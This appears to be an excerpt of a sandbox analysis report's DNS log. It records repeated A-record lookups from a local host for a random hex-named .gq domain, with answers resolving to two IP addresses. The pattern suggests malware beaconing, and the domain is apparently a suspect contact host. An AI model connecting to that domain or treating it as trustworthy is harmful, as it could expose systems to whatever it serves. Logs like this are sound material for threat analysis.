                      Oct 14, 2021 08:28:27.298286915 CEST192.168.2.68.8.8.80x111eStandard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:30.236521959 CEST192.168.2.68.8.8.80x868Standard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:31.345115900 CEST192.168.2.68.8.8.80xe6eeStandard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:32.470803976 CEST192.168.2.68.8.8.80x3d76Standard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:33.632031918 CEST192.168.2.68.8.8.80x69a5Standard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:34.851088047 CEST192.168.2.68.8.8.80x38bStandard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:35.953857899 CEST192.168.2.68.8.8.80xc4aStandard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:37.063189983 CEST192.168.2.68.8.8.80x7d39Standard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:38.346430063 CEST192.168.2.68.8.8.80xe711Standard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:39.473190069 CEST192.168.2.68.8.8.80x25efStandard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:41.046897888 CEST192.168.2.68.8.8.80x4f40Standard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:42.234715939 CEST192.168.2.68.8.8.80x6b50Standard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:43.827435970 CEST192.168.2.68.8.8.80xcc8cStandard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:45.159775019 CEST192.168.2.68.8.8.80xae8bStandard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:48.000888109 CEST192.168.2.68.8.8.80xd0feStandard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:49.619648933 CEST192.168.2.68.8.8.80x1cfeStandard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:50.931046009 CEST192.168.2.68.8.8.80x2f14Standard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:52.281750917 CEST192.168.2.68.8.8.80x9b51Standard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:53.526912928 CEST192.168.2.68.8.8.80x9b5cStandard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:54.606945038 CEST192.168.2.68.8.8.80xfafStandard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:56.038455963 CEST192.168.2.68.8.8.80xc5d7Standard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:57.478297949 CEST192.168.2.68.8.8.80x7539Standard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:58.838350058 CEST192.168.2.68.8.8.80xcc85Standard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:00.261539936 CEST192.168.2.68.8.8.80xca48Standard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:01.621984959 CEST192.168.2.68.8.8.80x41feStandard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:03.038508892 CEST192.168.2.68.8.8.80x76cbStandard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:06.114991903 CEST192.168.2.68.8.8.80xe495Standard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:07.492008924 CEST192.168.2.68.8.8.80xc716Standard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:08.682867050 CEST192.168.2.68.8.8.80x56caStandard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:09.870501995 CEST192.168.2.68.8.8.80xad00Standard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:11.079993010 CEST192.168.2.68.8.8.80xfca0Standard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:12.308362961 CEST192.168.2.68.8.8.80xce7cStandard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:13.616075993 CEST192.168.2.68.8.8.80xb217Standard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:15.094715118 CEST192.168.2.68.8.8.80x1e24Standard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:16.619941950 CEST192.168.2.68.8.8.80xce2aStandard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:17.969158888 CEST192.168.2.68.8.8.80xf846Standard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:20.357798100 CEST192.168.2.68.8.8.80xfa06Standard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:21.776597023 CEST192.168.2.68.8.8.80xc8c9Standard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:23.380697966 CEST192.168.2.68.8.8.80x4036Standard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:27.428143978 CEST192.168.2.68.8.8.80x9f87Standard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:29.608062983 CEST192.168.2.68.8.8.80xf256Standard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:31.696376085 CEST192.168.2.68.8.8.80xb97aStandard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:32.966362000 CEST192.168.2.68.8.8.80xe4c9Standard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:35.225338936 CEST192.168.2.68.8.8.80x3787Standard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:36.929517031 CEST192.168.2.68.8.8.80x493Standard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:38.099759102 CEST192.168.2.68.8.8.80x3e93Standard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:39.331229925 CEST192.168.2.68.8.8.80x6c70Standard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:40.663470984 CEST192.168.2.68.8.8.80x37c8Standard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:41.832782984 CEST192.168.2.68.8.8.80x82b7Standard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:43.238637924 CEST192.168.2.68.8.8.80xed11Standard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:44.388569117 CEST192.168.2.68.8.8.80xcc0dStandard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:45.724782944 CEST192.168.2.68.8.8.80x5ccfStandard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:46.881611109 CEST192.168.2.68.8.8.80x83fStandard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:48.011307001 CEST192.168.2.68.8.8.80x69c5Standard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:49.280458927 CEST192.168.2.68.8.8.80x6449Standard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:51.840734005 CEST192.168.2.68.8.8.80x6899Standard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:55.796895981 CEST192.168.2.68.8.8.80xdfe6Standard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:56.924676895 CEST192.168.2.68.8.8.80xdd17Standard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:58.030971050 CEST192.168.2.68.8.8.80xb23Standard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:59.187026978 CEST192.168.2.68.8.8.80x4332Standard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:30:00.267366886 CEST192.168.2.68.8.8.80x4eStandard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:30:01.374663115 CEST192.168.2.68.8.8.80xbb96Standard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:30:02.507575035 CEST192.168.2.68.8.8.80x9297Standard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:30:03.656306028 CEST192.168.2.68.8.8.80x202fStandard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:30:04.837879896 CEST192.168.2.68.8.8.80x89b0Standard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:30:05.918864965 CEST192.168.2.68.8.8.80xe22dStandard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:30:07.100869894 CEST192.168.2.68.8.8.80x1524Standard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:30:08.397211075 CEST192.168.2.68.8.8.80x1ae7Standard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:30:09.653837919 CEST192.168.2.68.8.8.80xbc15Standard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:30:11.092576981 CEST192.168.2.68.8.8.80xdd1Standard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:30:12.873286009 CEST192.168.2.68.8.8.80x11e2Standard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:30:15.296228886 CEST192.168.2.68.8.8.80x9ccStandard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:30:16.637487888 CEST192.168.2.68.8.8.80x2770Standard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:30:18.273524046 CEST192.168.2.68.8.8.80x6e34Standard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)

                      DNS Answers

                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                      Oct 14, 2021 08:28:19.010951996 CEST8.8.8.8192.168.2.60x9641No error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:19.010951996 CEST8.8.8.8192.168.2.60x9641No error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:20.325933933 CEST8.8.8.8192.168.2.60xcfd3No error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:20.325933933 CEST8.8.8.8192.168.2.60xcfd3No error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:21.317846060 CEST8.8.8.8192.168.2.60x66b6No error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:21.317846060 CEST8.8.8.8192.168.2.60x66b6No error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:22.570988894 CEST8.8.8.8192.168.2.60x7b38No error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:22.570988894 CEST8.8.8.8192.168.2.60x7b38No error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:23.760160923 CEST8.8.8.8192.168.2.60x65d8No error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:23.760160923 CEST8.8.8.8192.168.2.60x65d8No error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:24.865097046 CEST8.8.8.8192.168.2.60xc6baNo error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:24.865097046 CEST8.8.8.8192.168.2.60xc6baNo error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:26.003031015 CEST8.8.8.8192.168.2.60xa520No error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:26.003031015 CEST8.8.8.8192.168.2.60xa520No error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:27.316716909 CEST8.8.8.8192.168.2.60x111eNo error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:27.316716909 CEST8.8.8.8192.168.2.60x111eNo error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:30.266340971 CEST8.8.8.8192.168.2.60x868No error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:30.266340971 CEST8.8.8.8192.168.2.60x868No error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:31.363276005 CEST8.8.8.8192.168.2.60xe6eeNo error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:31.363276005 CEST8.8.8.8192.168.2.60xe6eeNo error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:32.486987114 CEST8.8.8.8192.168.2.60x3d76No error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:32.486987114 CEST8.8.8.8192.168.2.60x3d76No error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:33.648431063 CEST8.8.8.8192.168.2.60x69a5No error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:33.648431063 CEST8.8.8.8192.168.2.60x69a5No error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:34.869492054 CEST8.8.8.8192.168.2.60x38bNo error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:34.869492054 CEST8.8.8.8192.168.2.60x38bNo error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:35.970498085 CEST8.8.8.8192.168.2.60xc4aNo error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:35.970498085 CEST8.8.8.8192.168.2.60xc4aNo error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:37.092448950 CEST8.8.8.8192.168.2.60x7d39No error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:37.092448950 CEST8.8.8.8192.168.2.60x7d39No error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:38.365737915 CEST8.8.8.8192.168.2.60xe711No error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:38.365737915 CEST8.8.8.8192.168.2.60xe711No error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:39.491631031 CEST8.8.8.8192.168.2.60x25efNo error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:39.491631031 CEST8.8.8.8192.168.2.60x25efNo error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:41.065442085 CEST8.8.8.8192.168.2.60x4f40No error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:41.065442085 CEST8.8.8.8192.168.2.60x4f40No error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:42.252979994 CEST8.8.8.8192.168.2.60x6b50No error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:42.252979994 CEST8.8.8.8192.168.2.60x6b50No error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:43.845922947 CEST8.8.8.8192.168.2.60xcc8cNo error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:43.845922947 CEST8.8.8.8192.168.2.60xcc8cNo error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:45.178029060 CEST8.8.8.8192.168.2.60xae8bNo error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:45.178029060 CEST8.8.8.8192.168.2.60xae8bNo error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:48.019318104 CEST8.8.8.8192.168.2.60xd0feNo error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:48.019318104 CEST8.8.8.8192.168.2.60xd0feNo error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:49.638375998 CEST8.8.8.8192.168.2.60x1cfeNo error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:49.638375998 CEST8.8.8.8192.168.2.60x1cfeNo error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:50.949512959 CEST8.8.8.8192.168.2.60x2f14No error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:50.949512959 CEST8.8.8.8192.168.2.60x2f14No error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:52.300395012 CEST8.8.8.8192.168.2.60x9b51No error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:52.300395012 CEST8.8.8.8192.168.2.60x9b51No error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:53.543016911 CEST8.8.8.8192.168.2.60x9b5cNo error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:53.543016911 CEST8.8.8.8192.168.2.60x9b5cNo error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:54.625006914 CEST8.8.8.8192.168.2.60xfafNo error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:54.625006914 CEST8.8.8.8192.168.2.60xfafNo error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:56.054569006 CEST8.8.8.8192.168.2.60xc5d7No error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:56.054569006 CEST8.8.8.8192.168.2.60xc5d7No error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:57.496562958 CEST8.8.8.8192.168.2.60x7539No error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:57.496562958 CEST8.8.8.8192.168.2.60x7539No error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:58.857067108 CEST8.8.8.8192.168.2.60xcc85No error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:58.857067108 CEST8.8.8.8192.168.2.60xcc85No error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:00.278069973 CEST8.8.8.8192.168.2.60xca48No error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:00.278069973 CEST8.8.8.8192.168.2.60xca48No error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:01.640744925 CEST8.8.8.8192.168.2.60x41feNo error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:01.640744925 CEST8.8.8.8192.168.2.60x41feNo error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:03.056396961 CEST8.8.8.8192.168.2.60x76cbNo error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:03.056396961 CEST8.8.8.8192.168.2.60x76cbNo error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:06.133622885 CEST8.8.8.8192.168.2.60xe495No error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:06.133622885 CEST8.8.8.8192.168.2.60xe495No error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:07.510478020 CEST8.8.8.8192.168.2.60xc716No error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:07.510478020 CEST8.8.8.8192.168.2.60xc716No error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:08.701395035 CEST8.8.8.8192.168.2.60x56caNo error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:08.701395035 CEST8.8.8.8192.168.2.60x56caNo error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:09.889010906 CEST8.8.8.8192.168.2.60xad00No error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:09.889010906 CEST8.8.8.8192.168.2.60xad00No error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:11.098392010 CEST8.8.8.8192.168.2.60xfca0No error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:11.098392010 CEST8.8.8.8192.168.2.60xfca0No error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:12.326812029 CEST8.8.8.8192.168.2.60xce7cNo error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:12.326812029 CEST8.8.8.8192.168.2.60xce7cNo error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:13.634321928 CEST8.8.8.8192.168.2.60xb217No error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:13.634321928 CEST8.8.8.8192.168.2.60xb217No error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:15.112957954 CEST8.8.8.8192.168.2.60x1e24No error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:15.112957954 CEST8.8.8.8192.168.2.60x1e24No error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:16.638273001 CEST8.8.8.8192.168.2.60xce2aNo error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:16.638273001 CEST8.8.8.8192.168.2.60xce2aNo error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:17.987740993 CEST8.8.8.8192.168.2.60xf846No error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:17.987740993 CEST8.8.8.8192.168.2.60xf846No error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:20.374650002 CEST8.8.8.8192.168.2.60xfa06No error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:20.374650002 CEST8.8.8.8192.168.2.60xfa06No error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:21.795156002 CEST8.8.8.8192.168.2.60xc8c9No error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:21.795156002 CEST8.8.8.8192.168.2.60xc8c9No error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:23.396900892 CEST8.8.8.8192.168.2.60x4036No error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
